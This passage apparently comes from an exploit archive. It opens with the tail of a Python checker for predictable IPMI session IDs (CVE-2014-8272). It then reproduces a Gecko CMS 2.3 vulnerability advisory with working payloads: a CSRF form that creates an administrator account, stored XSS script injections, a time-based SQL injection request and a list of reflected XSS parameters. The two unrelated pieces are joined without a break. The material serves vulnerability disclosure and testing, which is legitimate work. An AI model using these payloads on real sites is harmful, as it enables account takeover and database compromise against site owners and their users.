continue
code = CloseSession (sess_seq, sess_id)
if code == 0:
#print '[+%04X] Close Session OK'%(i)
i += 1
sleep (0.5)
else:
#print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)
sleep(65)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print (exc_type, fname, exc_tb.tb_lineno)
session_ids = session_ids[:0xFF]
#get the first incremental diff
const_diff = None
for i in xrange(1, len(session_ids)):
if session_ids[i-1] < session_ids[i]:
const_diff = session_ids[i] - session_ids[i-1]
break
#check if session_ids are increasing at a fixed value
vulnerable = True
crossed_value_boundary = 0
for i in xrange(1, len(session_ids)):
if session_ids[i]-session_ids[i-1] != const_diff:
if crossed_value_boundary < 2:
crossed_value_boundary += 1
else:
vulnerable = False
if vulnerable:
print "Conclusion: BMC is vulnerable to CVE-2014-8272"
else:
print "Conclusion: BMC is not vulnerable to CVE-2014-8272"
if __name__ == "__main__":
main()
Gecko CMS 2.3 Multiple Vulnerabilities
Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2
Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been build to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!
Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.
Tested on: Apache/2
PHP/5.4.36
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php
27.12.2014
---
CSRF Add Admin:
===============
<html>
<body>
<form action="http://server/admin/index.php?p=user&sp=newuser" method="POST">
<input type="hidden" name="jak_name" value="Testingus2" />
<input type="hidden" name="jak_email" value="test2@test.test" />
<input type="hidden" name="jak_username" value="Testusername2" />
<input type="hidden" name="jak_usergroup" value="3" />
<input type="hidden" name="jak_access" value="1" />
<input type="hidden" name="jak_password" value="123123" />
<input type="hidden" name="jak_confirm_password" value="123123" />
<input type="hidden" name="save" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
usergroup 4 = moderator
3 = administrator
2 = member standard
1 = guest
5 = banned
Stored XSS (params: jak_img, jak_name, jak_url):
================================================
POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1
jak_catparent 0
jak_catparent2 0
jak_footer 1
jak_img "><script>alert(1);</script>
jak_lcontent <p>test</p>
jak_lcontent2
jak_menu 1
jak_name "><script>alert(2);</script>
jak_name2
jak_url "><script>alert(3);</script>
jak_varname ZSL
save
SQL Injection (params: jak_delete_log[], ssp):
==============================================
POST /admin/index.php?p=logs&sp=s HTTP/1.1
delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1
--
GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1
Reflected XSS:
==============
/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]